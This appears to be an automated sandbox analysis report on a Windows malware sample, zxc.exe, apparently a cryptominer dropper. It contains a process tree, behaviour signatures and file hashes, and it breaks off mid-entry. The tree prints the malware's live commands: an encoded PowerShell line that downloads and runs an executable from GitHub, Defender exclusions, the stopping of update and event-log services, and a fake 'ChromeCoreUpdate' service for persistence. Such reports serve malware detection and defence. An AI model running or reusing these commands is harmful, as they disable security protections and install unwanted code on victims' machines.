Analysis

  • max time kernel
    1800s
  • max time network
    1794s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    21-11-2024 19:36

General

  • Target

    zxc.exe

  • Size

    6KB

  • MD5

    1037e4868002ea28986b067e602219d5

  • SHA1

    eb606ee00af1c8e3982d827819feb020e552602e

  • SHA256

    cc938a7173b4bf5863d698d322be43378d520bdea430a390496b016c85410706

  • SHA512

    4924969ef9398f3a45ada5dfbaeab93d92d761100fd174075b53fbfe116738b31bc338a904a102631a7239ee8f82b8bd3ca222053385fb686820ef543ea6e183

  • SSDEEP

    96:TH79mNb60qvjnMmt3VI9dXlO5NzO6M8Ac/h6zanF3d3oj4rl:P9gqvjn3QdXlWNzOH8Ac/hT3d/

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 63 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:628
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1088
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:692
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:972
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:408
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
            1⤵
            • Indicator Removal: Clear Windows Event Logs
            PID:712
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
            1⤵
              PID:992
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1028
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1056
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                  1⤵
                    PID:1124
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                    1⤵
                      PID:1180
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                        PID:1312
                        • C:\Windows\system32\taskhostw.exe
                          taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                          2⤵
                            PID:2824
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1396
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            1⤵
                              PID:1476
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                              1⤵
                                PID:1484
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1492
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                  1⤵
                                    PID:1604
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1624
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                        • Modifies registry class
                                        PID:2688
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1684
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                        1⤵
                                          PID:1756
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1764
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1896
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:2016
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                1⤵
                                                  PID:1172
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1408
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1600
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:2116
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:2216
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2292
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2404
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2568
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                1⤵
                                                                  PID:2696
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2764
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2772
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2860
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2916
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2960
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2984
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2992
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:3060
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:3252
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3544
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                      PID:3632
                                                                                      • C:\Users\Admin\AppData\Local\Temp\zxc.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\zxc.exe"
                                                                                        2⤵
                                                                                        • Checks computer location settings
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1664
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcgByAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgB2AGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwB3AHMAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBCAHkAdABlAHIAQwBvAGQAZQAvAG0AaQBuAGUAcgAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBtAGkAbgBlAHIALgBlAHgAZQAnACwAIAA8ACMAZQBrAGUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHoAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBxAHUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB4AGQAdwBkAC4AZQB4AGUAJwApACkAPAAjAHgAcgBhACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAaQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAHgAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB4AGQAdwBkAC4AZQB4AGUAJwApADwAIwBkAHYAdAAjAD4A"
                                                                                          3⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1668
                                                                                          • C:\Users\Admin\AppData\Roaming\xdwd.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\xdwd.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in System32 directory
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2052
                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:704
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                              5⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2212
                                                                                              • C:\Windows\system32\wusa.exe
                                                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                6⤵
                                                                                                  PID:240
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                5⤵
                                                                                                • Launches sc.exe
                                                                                                PID:1780
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                5⤵
                                                                                                • Launches sc.exe
                                                                                                PID:2904
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe stop wuauserv
                                                                                                5⤵
                                                                                                • Launches sc.exe
                                                                                                PID:4308
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe stop bits
                                                                                                5⤵
                                                                                                • Launches sc.exe
                                                                                                PID:2364
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe stop dosvc
                                                                                                5⤵
                                                                                                • Launches sc.exe
                                                                                                PID:1696
                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                5⤵
                                                                                                • Power Settings
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:5044
                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                5⤵
                                                                                                • Power Settings
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1240
                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                5⤵
                                                                                                • Power Settings
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4248
                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                5⤵
                                                                                                • Power Settings
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:348
                                                                                              • C:\Windows\system32\dialer.exe
                                                                                                C:\Windows\system32\dialer.exe
                                                                                                5⤵
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3148
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe delete "ChromeCoreUpdate"
                                                                                                5⤵
                                                                                                • Launches sc.exe
                                                                                                PID:884
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe create "ChromeCoreUpdate" binpath= "C:\ProgramData\Updater\Updater32.exe" start= "auto"
                                                                                                5⤵
                                                                                                • Launches sc.exe
                                                                                                PID:4632
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe stop eventlog
                                                                                                5⤵
                                                                                                • Launches sc.exe
                                                                                                PID:4128
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe start "ChromeCoreUpdate"
                                                                                                5⤵
                                                                                                • Launches sc.exe
                                                                                                PID:1152
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  6⤵
                                                                                                    PID:3204
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                          1⤵
                                                                                            PID:3756
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:4044
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:4120
                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                1⤵
                                                                                                  PID:4352
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                  1⤵
                                                                                                    PID:2412
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:3816
                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                    1⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:3860
                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:2668
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                      1⤵
                                                                                                        PID:2192
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                        1⤵
                                                                                                          PID:3976
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:4316
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                            1⤵
                                                                                                              PID:4576
                                                                                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                              1⤵
                                                                                                                PID:4180
                                                                                                              • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca
                                                                                                                1⤵
                                                                                                                  PID:2636
                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:2288
                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:3008
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                      1⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      PID:544
                                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                      1⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Enumerates system info in registry
                                                                                                                      PID:4392
                                                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                      1⤵
                                                                                                                        PID:852
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                        1⤵
                                                                                                                          PID:1232
                                                                                                                        • C:\Windows\System32\mousocoreworker.exe
                                                                                                                          C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:3620
                                                                                                                          • C:\ProgramData\Updater\Updater32.exe
                                                                                                                            C:\ProgramData\Updater\Updater32.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:1812
                                                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                              2⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4740
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                3⤵
                                                                                                                                  PID:1132
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                2⤵
                                                                                                                                  PID:1192
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    3⤵
                                                                                                                                      PID:1704
                                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                      3⤵
                                                                                                                                        PID:1564
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                      2⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:2904
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                      2⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:4748
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        3⤵
                                                                                                                                          PID:4184
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                        2⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:388
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                                                                        2⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:4712
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          3⤵
                                                                                                                                            PID:2012
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                          2⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:4164
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                          2⤵
                                                                                                                                          • Power Settings
                                                                                                                                          PID:3540
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            3⤵
                                                                                                                                              PID:4948
                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                            2⤵
                                                                                                                                            • Power Settings
                                                                                                                                            PID:1784
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              3⤵
                                                                                                                                                PID:4372
                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                              2⤵
                                                                                                                                              • Power Settings
                                                                                                                                              PID:4888
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                3⤵
                                                                                                                                                  PID:652
                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                2⤵
                                                                                                                                                • Power Settings
                                                                                                                                                PID:4992
                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3476
                                                                                                                                                • C:\Windows\system32\dialer.exe
                                                                                                                                                  C:\Windows\system32\dialer.exe
                                                                                                                                                  2⤵
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:1156
                                                                                                                                                • C:\Windows\system32\dialer.exe
                                                                                                                                                  C:\Windows\system32\dialer.exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2544
                                                                                                                                                  • C:\Windows\system32\dialer.exe
                                                                                                                                                    dialer.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:560
                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1972

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                    Replay Monitor

                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                    Downloads

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                      Filesize

                                                                                                                                                      3KB

                                                                                                                                                      MD5

                                                                                                                                                      beddacb1b8cdf9b2701ec9ba52fc7a57

                                                                                                                                                      SHA1

                                                                                                                                                      42fc5858911200e8615ce0c223d19a3521468773

                                                                                                                                                      SHA256

                                                                                                                                                      839ab90ed4c452c99e6610f0bdc0be6290475e34407e5d3fa9c5fb38b6eeaf0e

                                                                                                                                                      SHA512

                                                                                                                                                      b738727610cccc12e4271974d7cf95cfaf143bc4010e3e3a90fe31ae922630821d46dad255a3ba7044c45cefaca3cb40696a46d55be0e5b3cc0b58cb5abfc04a

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                      Filesize

                                                                                                                                                      1KB

                                                                                                                                                      MD5

                                                                                                                                                      ed849f4810c49b5507fe22d778826d81

                                                                                                                                                      SHA1

                                                                                                                                                      7c27b7ba7253866ff393de956f83bb166cb3b52b

                                                                                                                                                      SHA256

                                                                                                                                                      b80ef6737a39b90e3a82351270b2427f4803946ea16949346736495e2627dd86

                                                                                                                                                      SHA512

                                                                                                                                                      d1455419705b822c7c89325384316243fccc8fc654820f66864e109728222760e9cbfc1fc732c6abb1cf021fcd6e6fca988a769810a9b7acfdb941312fe7f99c

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                                                      Filesize

                                                                                                                                                      290B

                                                                                                                                                      MD5

                                                                                                                                                      4b6cdcd7f18c2f5c1772d78bca2f345a

                                                                                                                                                      SHA1

                                                                                                                                                      057aebe7d62b8fc1b9f0a6329665c14e2812d90a

                                                                                                                                                      SHA256

                                                                                                                                                      aac992c2a092a1c2c195169f50d8c11e92f1d95bc0ea1164c8c59bd838152312

                                                                                                                                                      SHA512

                                                                                                                                                      aacad78f263b916053b7d0e941d367ee8f9283c58860d9a56f90272ce3a4df7b26359fd8139f81c718d3b0e6b65f91acb8a9349baad27e05599b8818dc82bd9f

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k4yqurg0.0pi.ps1

                                                                                                                                                      Filesize

                                                                                                                                                      60B

                                                                                                                                                      MD5

                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                      SHA1

                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                      SHA256

                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                      SHA512

